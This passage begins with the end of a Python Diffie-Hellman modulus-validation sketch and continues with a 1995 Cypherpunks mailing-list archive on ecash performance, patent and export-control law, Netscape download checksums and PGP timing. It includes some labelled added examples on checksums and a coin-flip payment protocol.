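def check_private_modulus(p, expected_bits):
    """Validate a peer-supplied modulus before using it; returns (ok, reply)."""
    if p.bit_length() != expected_bits:
        return False, "404 WRONG MODULUS LENGTH"
    if not is_probable_prime(p) or not is_probable_prime((p - 1) // 2):
        return False, NOT_STRONG
    return True, "DO MODULUS"


if __name__ == "__main__":
    offer = ["512PRIV", "768", "1024", "1024ALT", "2048"]   # from the sketch
    print(choose_modlength(offer, allow_short_private=True))
    print(choose_modlength(offer))
    print(check_private_modulus(OAKLEY_768, 768))
    print(check_private_modulus(2 ** 127 - 1, 127))         # prime, not safe
```

With the default policy the responder skips 512PRIV and 768 and answers with 1024, which is the "Alice can always force Bob to use the large modulus" behaviour quoted above.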




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 22:56:30 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511091441.JAA15345@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.
[Describes lots of steps...]

I'm really not that convinced that this is a problem in either
direction. With users everywhere on the net connected via
multi-megabit per second links, high speed CPUs, etc, a few extra TCP
connections and RSA operations really might not be noticed in a half
dozen years.

> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.

Again, I'm not convinced either way. I believe we have to wait and see
how fast things really are in practice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Nov 1995 02:34:18 +0800
To: cypherpunks@toad.com
Subject: New patent rules
Message-ID: <199511091751.JAA15752@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Reading the latest Foresight Update articles in the sci.nanotech newsgroup,
I came upon an analysis of upcoming changes to the patent laws.  With
the signing of the GATT treaty the laws will change next year.  Here
is one of the changes, quoting from the article:

    Infringement. Present U.S. patent law grants to a patent
    holder the right to exclude others from making, using, or selling the
    patented invention in the United States.  After about January 1, 1996,
    a patent holder has the right to exclude others also from offering for
    sale patented products or products made using a patented process.
    Thus, under the law as amended, the mere offer for sale of a patented
    product may be treated as an infringing act.  In addition, it will be
    illegal to import a product covered by a U.S. patent.

At first I thought this would not have much impact on crypto software,
which is of course heavily patented.  The current laws already prevent
people from making, using, or selling software which uses patented
algorithms.  The new restrictions on products made using a patented
process would not seem to be relevant.

But there is a possible interpretation which would be very significant.
What if data which has had cryptographic transformations applied were
viewed as a product of a possibly patented process?  An RSA-signed or
-encrypted message might then be such a product.  A blinded coin or other
credential, a key signature or certificate, virtually all of the things
we are interested in could be thought of in those terms.

We have occasionally discussed setting up offshore servers and such to
perform patented cryptographic algorithms.  But if the resulting data
is itself illegal to import, that would make this strategy much more
difficult.  Would it become illegal to "import" messages from
non-RSAREF versions of PGP, or to hand someone a Chaum-type cash token
issued by an offshore bank in a jurisdiction where his patents don't
apply?

I wonder if the lawyers on the list have any thoughts about whether such
an interpretation of the GATT rules is likely to stand.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 9 Nov 1995 23:15:04 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <9511090956.ZM2558@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 9,  7:52am, Rich Salz wrote:
> Subject: Re: Pegasus Mail
> I sure hope someone tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
Hm. David Harris lives in New Zealand.

This makes him a very good man to be writing mail software. Also makes
Pegasus Mail our local software of choice. (We use it at school.) That
it now has hooks for external encryption packages is very good news.

richard
--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 10 Nov 1995 03:04:46 +0800
To: cypherpunks@toad.com
Subject: checksums for Netscape Navigator 2.0 Beta 2
Message-ID: <199511091816.KAA04865@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 2.0 Beta 2
distribution files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/2.0beta/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my personal PGP key.  My PGP public key, which
can be used to verify the signature on this file, can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two version of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.  Note that some Sun systems have
both versions of the sum command, so the results you get will depend
on your shell PATH variable.

	--Jeff

========================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

f4624a2afa4fbab3b91df62a9c9ebe71  unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
0039da76358854a8dbf81297f8695aa4  unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
cbf1b480f74cd0f3545184f441670a81  unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
b5e27641d344cafb15711ccabd02aa62  unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
cb22244b63c4b1f0a484a10a2bed3059  unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
160a862a2628a80dd68a9cccccb1a938  unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
2b90a96e95f28867b62d037df4e98c9d  unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
4352513f5672c7292bf2d47a2bb61ecd  unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
faaebbbc60565fbe9ab6d36b22dfc375  unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
d6641fbd95fcf5b27b5f07766f688f3a  mac/netscape-2.0b2.hqx
00949f13e3b663dbe8cce6da3be2c39a  windows/n1620b2a.exe
06c3e13f81bc3086c3a49b4268718d2a  windows/n32e20b2.exe

========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, SGI IRIX and HPUX systems.


========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.


Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
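
[Added example, not part of the original message and not Netscape's code: why one download can match either of two `sum` lists, and why only the signed MD5 list says anything about tampering. The names "BSD" and "System V" for the two variants are mine (the message identifies them only by platform); the file name and contents are constructed.]

```python
import hashlib

def bsd_sum(data):
    """BSD-style sum: rotate the 16-bit checksum right, add each byte; 1024-byte blocks."""
    checksum = 0
    for byte in data:
        checksum = (checksum >> 1) + ((checksum & 1) << 15)
        checksum = (checksum + byte) & 0xFFFF
    return checksum, -(-len(data) // 1024)

def sysv_sum(data):
    """System V-style sum: add all bytes, fold the total to 16 bits; 512-byte blocks."""
    total = sum(data) & 0xFFFFFFFF
    folded = (total & 0xFFFF) + (total >> 16)
    checksum = (folded & 0xFFFF) + (folded >> 16)
    return checksum, -(-len(data) // 512)

def parse_sum_list(text):
    """Parse 'checksum blocks path' lines into {path: (checksum, blocks)}."""
    entries = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            entries[fields[2]] = (int(fields[0]), int(fields[1]))
    return entries

def matching_lists(local_sum, path, lists):
    """Names of the published lists whose entry for `path` equals the local result."""
    return [name for name, entries in lists.items() if entries.get(path) == local_sum]

# Constructed sample: a stand-in "download" and the two lists a publisher would post.
PATH = "unix/example.tar.Z"
SAMPLE = bytes(range(256)) * 10
SYSV_LIST = "%d %d %s" % (sysv_sum(SAMPLE) + (PATH,))
BSD_LIST = "%05d %5d %s" % (bsd_sum(SAMPLE) + (PATH,))

def demo():
    lists = {"sysv": parse_sum_list(SYSV_LIST), "bsd": parse_sum_list(BSD_LIST)}
    # MD5 as in the 1995 message; a current manifest would use SHA-256.
    published_md5 = hashlib.md5(SAMPLE).hexdigest()
    # Same bytes in a different order: the byte total, and so the System V sum,
    # is unchanged even though the content is not what was published.
    tampered = SAMPLE[::-1]
    return {
        # A user does not know which variant is first in PATH, so checks both lists.
        "bsd_user": matching_lists(bsd_sum(SAMPLE), PATH, lists),
        "sysv_user": matching_lists(sysv_sum(SAMPLE), PATH, lists),
        "tampered_sysv": matching_lists(sysv_sum(tampered), PATH, lists),
        "tampered_md5_ok": hashlib.md5(tampered).hexdigest() == published_md5,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The reordered file still matches the System V list, which is why `sum` is only a transfer-error check; the cryptographic hash inside the signed message is what detects modification.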




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 23:29:02 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091518.KAA08137@homeport.org>
MIME-Version: 1.0
Content-Type: text


I sure hope no one does.  The ITARs seem to contain a 'scienter'
requirement; that you must know (or have a reasonable idea) that you
are breaking them for it to be criminal.  If he thinks he's ok, he is
until someone tells him otherwise.

	I am not a lawyer.  That is not legal advice.  Go consult a
good ITAR attorney if you want to try that at home. :)

Rich Salz wrote:

| I sure hope someone tells David Harris that his program is now export
| controlled.  From my reading of his message, it seemed like he thinks he
| "beat the system" because he didn't include actual crypto code.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:24:19 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc774f813021004a77a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:58 PM 11/9/95, Beavis B. Thoopit wrote:

>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?

"All crypto is economics."

There's a literature of sorts on "tamper-resistant modules," or
"tamper-responding modules." Chips or packages that either resist tampering
(= reading, opening, etc.) or that give indication they have been read,
opened, or otherwise accessed.

"Quantum cryptography" aims at providing a "read only once" system. Consult
the vast number of articles and comments available.

Basically, any secret stored in (traditional) hardware can be gotten with
enough money. The issue is the amount of money it takes, and how many
tries, to open the hardware.

(And it may take a lot. Or destroy a lot of chips in the process. The
similarities to bomb disposal are obvious: it may be _possible_ to disarm a
bomb, but a lot of "learning" is likely to take place first.)

Search the archives if you wish for previous articles I and others have
written on reverse-engineering chips with electron beam probes, for
example.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:27:13 +0800
To: cypherpunks@toad.com
Subject: Caching Cash (ecash speed)
Message-ID: <acc7778214021004402c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:14 AM 11/9/95, Bill Stewart wrote:

>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_ cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.
>
>If that's not anonymous enough for you (because your IP address could be
>traced when you buy the tokens, and coordinated with them later),
>use a packet laundry, or connect from your dialup access provider,
>which will tell the newspaper you're port43.server29.netcom.com or
>something equally uninformative; or dial in from the public library or cafe.

Tokens, coupons, gift certificates, etc., are all good examples of
_caching_. As, looked at in a certain way, ordinary folding or jangling
cash is an example of caching. (Yes, quibblers, it is true that we view
folding money as "real money," but really it's a series of claims against
some store of value, formerly gold and silver, and now...?)

Instead of constant interactions with a bank, we place money in "cash
memory" (I mean, "cache memory").

The concerns Hal raises about ecash speed are important. CPU speeds are not
the problem, network speeds are---many home and small business users have
very fast CPUs, able to function as Web servers all by themselves, but have
relatively slow network connections.

So, various schemes for reducing the network bottlenecks will be likely.

Tokens are a good example. And as Bill notes, token laundries can make them
_effectively_ untraceable, good enough for many of the low-value
transactions for which they are intended. (As usual, more security means
more computation, more delay, all other things being equal.
"TANSTAAFL"--There Ain't No Such Thing As A Free Lunch.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 03:38:57 +0800
To: cypherpunks@toad.com
Subject: Re: Caching Cash (ecash speed)
Message-ID: <199511091850.KAA12286@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 11/9/95 -0800, Timothy C. May wrote:
>The concerns Hal raises about ecash speed are important. CPU speeds are not
>the problem, network speeds are---many home and small business users have
>very fast CPUs, able to function as Web servers all by themselves, but have
>relatively slow network connections.

Tim is of course right that network speeds are the problem.  However, the
network limit is the speed of light and not current network technology.  If
your bank is half-way around the world, the 1/7 second round trip will kill
any chance you have of offering 1/10 second response time.

For some thinking on the subject of caching cash, see the "Digital Silk
Road" paper accessible through the Agorics home page:
http://www.webcom.com/~agorics/

BTW - I don't think we should be talking about a penny/page cost because it
is way too high for the current market.  For example, my copy of Applied
Cryptography V2 cost about $.067/page AND came with the media to keep it
"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
also came with the media.  I would think that somewhere between 1/100 to
1/10 of a penny/page is closer to the current market value of the page
content.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 00:23:00 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <47m82v$4p4@yage.tembel.org>
Message-ID: <199511091558.KAA00768@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


I have not yet convinced myself that a time-release information device
is impossible....

Does there exist a storage device that, due to _dynamics_ (or other
factor), prevents the total contents being read in one instance?

Bubble memory device?  Torsion wire memory device?

Back at IBM, an old school customer engineer friend of mine used to
bring in relics of IBM's illustrious past.  One curious device was a
memory device for an old terminal.  This device consisted of about
10 feet of piano wire coiled into a spiral of about 6 inches diameter.
An actuator would "twist" torsion waves onto the end of the wire.
These waves would propagate down the wire and would be sensed falling
off the opposite end.  About 400+ bits could be stored on the wire by
twisting (cwise/0 or ccwise/1) them onto one end, sensing them as
they came off, and re-twisting them back on.  The bits chased each
other around this loop.

Assume that I can only read the bits as they fall off the end (one
bit at a time).
Assume a transformation function (with state) in the middle of the
"wire" which cryptographically transforms the bits.
Assume a device that holds 2^somewhatbig bits.
Assume a traversal delay around the device of 1 unit.
Assume disturbing the device ("grabbing the wire") destroys the information.
Assume the message sender loads the wire with an "encrypted" message.

Can I precompute a message that after N iterations around the "wire"
(and through the transform) will spill out plaintext (N time units
into the future)?
Does such a transformation exist?  (rings of the technology in S/key...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Fri, 10 Nov 1995 02:17:29 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Pegasus Mail 2.20
Message-ID: <199511091727.LAA14980@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Rich Salz <rsalz@osf.org>
> Date:          Thu, 9 Nov 1995 07:50:44 -0500
> To:            scottst@ionet.net
> Subject:       Re:  Pegasus Mail 2.20
> Cc:            cyperphunks@osf.org

> I sure hope someone tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
> 
> Software that says "plug your own crypto here" is considered an ancillary
> device according to the ITAR.  Or, as I heard some NSA people call it,
> "the classic 'crypto with a hole'."  Seems kinda silly that the hole is
> the crypto, but hey that ancillary device clause, you just gotta love
> it.
> 
> If Pegasus mail were written to support generic user-loadable content
> transforms, that would be different.  But even then, you have to be careful
> how that's done.  If you just did some global search-and-replace and came up
> with "keyed compression" you wouldn't get past anyone.  But if you had an
> opaque state block that the user modules could set/use/clear, and you
> passed that along with your in/out buffers, then you'd be safe.  Of course,
> they'd know what is really going on, but are powerless to prevent it.
> 	/r$
> 

   Actually, David Harris is a citizen of New Zealand. If the US government 
tries anything, at least we'll know if ITAR applies to foreign written 
freeware.
--scottst@ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@owl.csusm.edu
Date: Fri, 10 Nov 1995 04:30:29 +0800
To: "From:  Marshall Clow" <mclow@owl.csusm.edu>
Subject: New address
Message-ID: <v03003b0eacc805abfe1d@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Everyone --

This morning, without any warning, the local university decided to change
all their mail aliases. Mail sent to "mclow@coyote.csusm.edu" now bounces,
and the new address is "mclow@mailhost2.csusm.edu".

Please update your address books.
Sorry about that :-(

P.S. Those of you who send mail to Laurie, her email address is now
	"lclow@mailhost2.csusm.edu"

-- Marshall

Marshall Clow
Aladdin Systems
mclow@mailhost2.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 10 Nov 1995 01:10:17 +0800
To: Armadillo Remailer <cypherpunks@toad.com
Subject: Re: Worth of Crypto Consulting
In-Reply-To: <199511090735.BAA01846@monad.armadillo.com>
Message-ID: <9511091650.AA22280@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I was wondering what "real" crypto consultants are getting these days.

I know some people who charge $500 a day and others who charge $5000.
It basically depends on reputation and knowledge.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 05:45:32 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
Message-ID: <199511092020.MAA28155@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Perry E. Metzger wrote:

>Timothy C. May writes:
>> Implying that the reason Bellovin and Karn left the list--if they did, as I
>> haven't checked--was because of "off-topic" posts seems to be a stretch.
> 
>They both left because the noise level was too high and the
>cryptography content too low. I'll ask Steve to comment if you insist.

I'd be interested as to whether or not they are tuned in here, either
directly or indirectly through some type of list reflector/filter.  Some
people might just read this list and not post.  They may not have anything
to say or contribute, or maybe they just don't want to add to list noise,
but hopefully they do keep up with the mailing list discussion as a first
priority. 

Just because someone doesn't post, doesn't mean that they've left, or not
listening.  It just means that we aren't hearing from them. 

Steve Bellovin, (if this is the AT&T, Steve Bellovin) has corresponded
with me.  He wrote me about the security flaw in Netscape I detailed to
this list, so I can assume from that, that he IS aware of it and is still
aware of the list (if it is the AT&T Steve Bellovin, I mean).  If not, my
mistake. 

I suppose I could ask him whether he is reading this list, or not.

Is Steve AT&T's Security Officer or something?  He never really introduced
himself when he emailed me, and he never presented me with any credentials
or letters of introduction.  But if he is so well known (news to me), and
has a well known reputation -- probably a reputation on a par with noted
international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
probably a very busy fellow. 

I wonder who he is at AT&T?

>> Lots of other people have joined the list, and the subscription base has
>> gone from an earlier plateau of about 700 subscribers to more than 1200
>> recently.
> 
>I don't care about quantity. Steve Bellovin is worth 500 subscribers
>-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
>lot of this stuff than most of what passes for careful thought from
>the average person here.

Yes.  He is worthwhile from what I have seen.

He has said that he will probably be consulted at AT&T if there is ever
any type of Internet issue.  I'm not sure if that makes him one of AT&T's
Internet consultants or whether he is one of the responsible persons at
AT&T.  But I'd rather let Steve speak for himself on that. 

I don't know if Steve has the explicit authority to have the Chairman take
his call as an example and I doubt that -- on his pen -- a full Board
Meeting could be convened to bring all opinions forward to the table, so
that those who are CHARGED with decision making CAN make decisions. 

I think he probably has to go through channels. 

(Direct access to senior management is generally part and parcel of any 
functioning security policy.  It has to be.  And I assume that AT&T does 
have one.)

I'm slowly working through my mail queue, and will probably reply soon to
Steve's email.  It's flagged.  And I can probably ask at that time whether
he DOES read this list, and settle the issue. 

I really don't want to bother him though with trivial questions and
comments when he's probably busy forming an inter-departmental Working
Group to *carefully* deal with the Netscape issue -- a large committee to
focus on the problem that blindsided AT&T, a committee to focus on
deployment strategies.  I assume that that's why Steve's not posting to
this list and providing free entertaining content to Internet subscribers. 

He's probably too DAMNED busy.  (And not getting paid NEARLY enough ;)

I hope that AT&T's Netscape Security Audit Working Group's first order of
business is to elect one person to deal with external email, rather than
having each individual employee from AT&T send, _yours truly_ a "Me Too"
... "I'm responsible"  ... "this is MY turf" reply.  But that's not a list
discussion so I'll take it off-line where it belongs, and keep Perry
as happy as I can.)

That discussion ... the "everyone at AT&T is responsible" one, belongs
with the Netscape one ... the one where "no one at Netscape is
responsible", the one where "nobody from Netscape ever replies" to your
email. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Fri, 10 Nov 1995 04:30:57 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <m0tDcXQ-000900C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:08 PM 11/8/95 -0800, Hal <hfinney@shell.portal.com> wrote:
>>Consider, though, what happens in the current ecash system if it were
>>used to charge a penny per page.  You would click on a link in your web
>>browser to go to the new page.  It would set the GET request to the
>>remote server as usual.
>
>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_ cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.


I think that one thing that's needed is the concept of probabilistic payments.  

The problem:  How do you pay, say, 1/10th of a penny for a good or service
if the minimum denominated coin is a penny?   This is important, because as
we all know the cost of providing computer services of all kinds (and data
transmission) can be expected to continue to drop as time progresses.   If
we allow the minimum size coin to control our lives, it will keep prices
higher than they ought to be and prevent low-cost services from existing.

The answer, I suggest, is that the payer and payee should "flip a coin,"
actually a probability, such that the likelihood of making the payment times
the size of the payment equals the intended payment.

If a seller wants to sell access at 1/10th of a penny per page, he and I can
flip a 10-sided coin (using encryption principles already established)
leading to a 1/10 likelihood that I would have to pay 1 cent, and a 9/10
likelihood that I'll get the service for free.  On the average, it'll be a
payment of 1/10th of a cent.
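
[Added example, not part of the original message: one way to run the 10-sided "coin flip" between two parties who do not trust each other. It assumes a SHA-256 hash commitment as the coin-flipping principle (the message names no specific protocol); all function names are hypothetical.]

```python
import hashlib
import hmac
import secrets

SIDES = 10        # 1-in-10 chance of paying
COIN_CENTS = 1    # smallest coin, as in the message

def commitment(digit, nonce):
    """Hash that binds the payer to `digit` without revealing it."""
    return hashlib.sha256(nonce + bytes([digit])).digest()

def settle(payer_digit, payer_nonce, payee_digit, published_commitment):
    """Payee-side check of the payer's reveal, then the shared outcome.

    Returns the cents owed for this page. Raises ValueError if the reveal
    does not match what the payer committed to before seeing payee_digit.
    """
    if not (0 <= payer_digit < SIDES and 0 <= payee_digit < SIDES):
        raise ValueError("digit out of range")
    expected = commitment(payer_digit, payer_nonce)
    if not hmac.compare_digest(expected, published_commitment):
        raise ValueError("reveal does not match commitment")
    # Neither side alone controls the sum: the payer chose first but blind,
    # the payee chose second but could not see the payer's digit.
    outcome = (payer_digit + payee_digit) % SIDES
    return COIN_CENTS if outcome == 0 else 0

def one_page():
    """One full exchange with honest parties."""
    # 1. Payer picks a digit and sends only the commitment.
    payer_digit = secrets.randbelow(SIDES)
    nonce = secrets.token_bytes(16)
    sent = commitment(payer_digit, nonce)
    # 2. Payee, holding the commitment, replies with its own digit.
    payee_digit = secrets.randbelow(SIDES)
    # 3. Payer reveals digit and nonce; payee verifies and computes the charge.
    return settle(payer_digit, nonce, payee_digit, sent)

def average_cost(pages):
    """Mean cents paid per page over many independent flips."""
    return sum(one_page() for _ in range(pages)) / pages

if __name__ == "__main__":
    print("average cents per page:", average_cost(20000))
```

The payer learns the outcome before revealing, so a payee using this sketch has to treat a missing reveal as a refusal to pay and withhold the page.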






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 06:03:59 +0800
To: perry@piermont.com
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091951.OAA15564@jekyll.piermont.com>
Message-ID: <199511092046.MAA16851@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I've found that in practice the compression pass takes longer than the
> RSA pass for PGP. If you accept the time for the file compression I
> don't see how you can have trouble with the 1024 bit RSA operation.

When in doubt, measure. The following measurements were done on a DEC
Alpha 3000/300, 150Mhz, Digital Unix 3.2. The first test file was an
email I sent this morning, with a size of 5379 bytes, which is typical
for the email I send. The second test file was the PostScript version
of a 52 page tech report done by our research group this summer, with
a size of 656676 bytes. The version of PGP used was MIT 2.6.2, compiled
with the default osf configuration (-O compile flag).

In all cases, user time only (not system time) is measured. This seems
reasonable, because neither compression nor RSA inherently require I/O.
The standard deviation on timings was somewhere around 5 or 10 ms. I
took the average "by eye" over about ten runs each. I did not include
signing tasks, as neither PGP/MIME signing nor clearsigning include a 
compression step.

Task 1: encrypt file, generating compressed output (RSA is quadratic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           95 ms   5379 bytes      2205 bytes
382      off          90 ms   5379 bytes      8165 bytes
1024     on           90 ms   5379 bytes      2315 bytes
1024     off          85 ms   5379 bytes      8275 bytes
382      on           3.86 s  656676 bytes    255575 bytes
382      off          2.43 s  656676 bytes    920984 bytes
1024     on           3.84 s  656676 bytes    255685 bytes
1024     off          2.43 s  656676 bytes    921090 bytes

Task 2: decrypt file from Task 1 (RSA is cubic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           135 ms  2205 bytes      5379 bytes
382      off          140 ms  8165 bytes      5379 bytes
1024     on           1.14 s  2315 bytes      5379 bytes
1024     off          1.14 s  8275 bytes      5379 bytes
382      on           1.43 s  255575 bytes    656676 bytes
382      off          2.68 s  920984 bytes    656676 bytes
1024     on           2.42 s  255685 bytes    656676 bytes
1024     off          3.74 s  921090 bytes    656676 bytes

We can conclude that for small files, the size of a typical email,
compression is completely negligible, and the effect of key size is
significant. We can also conclude that for large compressible files,
compression increases encryption time by roughly two seconds per
MB, but decreases decryption time by roughly the same amount (by
virtue of having to decrypt fewer bytes).

Raph






